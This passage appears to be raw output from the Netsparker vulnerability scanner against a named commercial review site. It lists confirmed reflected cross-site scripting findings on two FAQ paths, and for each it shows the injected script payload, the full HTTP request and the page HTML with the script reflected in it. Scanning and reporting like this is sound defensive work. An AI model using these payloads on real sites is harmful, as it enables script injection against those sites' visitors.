href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blo..
- /virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000368)%3C/script%3E

/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000368)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000368)</script>

Request

GET /virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/virtual_phone/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6380
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", virtual phone, virtual phone number, virtual pbx, virtual office, virtual attendant,, Phone.com, eVoice, Ring Central, FreedomVoice, Nextiva Connect" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/virtual_phone/'"--></style></script><script>netsparker(0x000368)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000368)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/virtual_phone_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Virtual Phone & Virtual Office FAQ</h1> <p>Frequently Asked Questions about Virtual Phone & Virtual Office</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Virtual Phone & Virtual Office:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="virtual_phone"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory..
- /voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000376)%3C/script%3E

/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000376)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000376)</script>

Request

GET /voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/voip_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:59:20 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 7011
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", voip review, voip services reviews, voip service review, voip, internet phone service, internet phone service price, broadband phone information, long distance phone services, Vonage, VOIPo, Phone Power, Phone.com, ViaTalk, VYL Media, Lingo, Skype Phone" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/voip_services/'"--></style></script><script>netsparker(0x000376)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000376)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">All VoIP</a> <span class="nav_border">|</span> <a href="compare.php">Home VoIP</a><span class="nav_border">|</span> <a href="small_business_voip.php">Business VoIP</a><span class="nav_border">|</span> <a href="/voip_services/other_voip.php">Other VoIP</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/voip_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> VoIP FAQ</h1> <p>Frequently Asked Questions about VoIP</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about VoIP:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="voip_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content" style="padding:8px 0 5px 8px;"> <iframe frameborder="0" height="280" width="285" name="voip_form" src="/voip_services/form1-sm.php" scrolling="no"></iframe> </div> </div> </div> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-bl..
